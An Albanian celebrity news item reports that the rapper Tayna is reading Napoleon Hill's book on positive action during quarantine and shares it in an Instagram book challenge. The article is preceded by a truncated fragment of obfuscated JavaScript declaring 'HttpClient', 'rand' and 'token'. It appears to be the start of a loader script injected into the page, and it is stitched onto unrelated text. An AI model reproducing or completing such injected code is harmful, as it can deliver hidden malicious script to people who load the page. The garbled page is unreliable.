;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Libri që Tayna po lexon momentalisht është ai që na duhet këto kohë

By

Ditë më parë, Prive transmetoi se aktiviteti më i shpeshtë i Taynës tash këto kohë në karantinë është leximi.

Libri që ajo po lexon është ai që na duhet për të ndërruar qasjen e shumë njerëzve tani që po e kanë problem karantinën.

Pak qasje pozitive ndaj gjtihë situstës është tejet esenciale që të mbajmë një mendje të shëndoshë.

Së fundmi në Instagram, ka filluar një sfidë e re që po e quajnë “Book challenge”, ku Tayna ndau edhe titullin e librit që ajo po lexon momentalisht duke etiketuar edhe artistë të tjerë, të ndajnë tituj tjerë.

Reperja po lexon librin “Fuqia e veprimit pozitiv” nga Napoleon Hill, një libër nga zhanri i saj i preferuar.

Ata që gëzojnë fuqinë e veprimit pozitiv arrijnë më shumë, kanë më pak stres, jetojnë me më pak pendesë, bëhen më të vetë-disiplinuar dhe demonstrojnë këmbëngulje personale. Këto cilësi kontribuojnë për ta bërë botën tonë unike një vend më të mirë për të jetuar – dhe është pikërisht kjo që ky libër përçon. /Prive.al

Artikuj të ngjashëm